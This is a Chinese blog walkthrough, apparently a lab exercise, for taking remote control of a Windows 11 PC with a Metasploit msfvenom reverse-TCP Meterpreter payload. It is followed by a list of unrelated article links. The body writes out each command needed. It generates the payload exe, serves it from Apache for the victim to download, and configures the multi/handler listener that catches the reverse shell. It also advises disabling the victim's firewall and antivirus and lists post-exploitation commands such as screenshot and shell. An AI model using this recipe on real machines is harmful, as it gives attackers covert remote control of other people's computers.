当前位置: 首页 > news >正文

利用Msfvenom实现对Windows的远程控制

1.实验准备

kali安装 Apache2(如果尚未安装)

sudo apt install apache2

启动 Apache2 服务

sudo systemctl start apache2
确认 Apache2 的默认网页可以访问

打开浏览器并访问 http://<你的Kali IP>,检查是否显示 Apache2 默认页面。

2.msf远控生成

(1)在kali运行msf生成exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali_ip LPORT=5000 -f exe -o /root/payload.exe

将kali_ip填好自己对应的ip地址,结果如下:

(2)将有效载荷文件复制到 Apache 的根目录

sudo cp /root/payload.exe /var/www/html/
 

(3) 设置 Metasploit 监听器

启动 Metasploit 控制台

msfconsole

使用多重处理程序

use exploit/multi/handler

设置有效载荷

set payload windows/meterpreter/reverse_tcp

设置 LHOST 和 LPORT

set LHOST <你的Kali IP>
set LPORT 5000

启动监听器

exploit

 

3.win11本地进行下载

在 Windows 上下载并运行有效载荷

在 Windows 上打开浏览器,输入以下地址:

http://<你的Kali IP>/payload.exe

 

要注意这里记得关闭自己本地的防火墙以及杀毒软件

4.远控实现以及命令

使用 Meterpreter 会话进行操作
  • 你可以使用以下命令进行远程控制:
    • sysinfo:获取目标系统信息。
    • screenshot:截取屏幕。
    • shell:获取系统 shell。

但是如上图所示,win11的安全会对返回的信息进行加密

5.沙箱检测exe

这里比较有点难崩,是在是忍不住笑了出来,因为exe已经把win11拿下来了都,结果腾讯安全这边没分析出来风险文件。

这下真成了年度笑话了,希望有关部门早日修改一手,哈哈。

 地址:

habo.qq.com

 最后还得是•​​​​​​www.virustotal.com

 

希望我的文章能够帮助大家,感谢大家!

http://www.lryc.cn/news/469636.html

相关文章:

  • Java Iterator和for区别详解和常见问题及解决方式
  • 川渝地区软件工程考研择校分析
  • 快捷键记忆
  • Flutter鸿蒙next 状态管理高级使用:深入探讨 Provider
  • JMeter实战之——模拟登录
  • 智能台灯设计(一)原理图设计
  • 数据库查询返回结果集及其元数据信息:ResultSet 和 ResultSetMetaData 深度解析
  • 2.插入排序(斗地主起牌)
  • 漫谈编程小白如何成为大神:夯实基础,开启通神之路
  • 基于机器学习的个性化电影推荐系统【源码+安装+讲解+售后+文档】
  • 企业如何配合好等级保护测评工作?
  • Could not find artifact cn.hutool:hutool-all:jar:8.1 in central 导入Hutool报错
  • 【功能安全】汽车功能安全个人认证证书
  • axios直接上传binary
  • 量化交易API接口是什么?如何申请和应用?
  • 语义分割:YOLOv11的分割模型训练自己的数据集(从代码下载到实例测试)
  • Python爬虫:从入门到精通
  • Web组态软件
  • Java中为什么要私有化构造方法
  • 【大数据学习 | kafka】kafuka的基础架构
  • 2-petalinux2018.3摸索记录-petalinux rootfs
  • RHCE作业二
  • GPS/北斗时空安全隔离装置(卫星时空防护装置)使用手册
  • 【C++篇】深度解析类与对象(下)
  • 【gRPC】什么是RPC——介绍一下RPC
  • 谈谈你对AQS的理解
  • Bitcoin全节点搭建
  • 【mysql进阶】4-6. InnoDB 磁盘文件
  • HexForge:一款用于扩展安全汇编和十六进制视图的IDA插件
  • WORFBENCH:一个创新的评估基准,目的是全面测试大型语言模型在生成复杂工作流 方面的性能。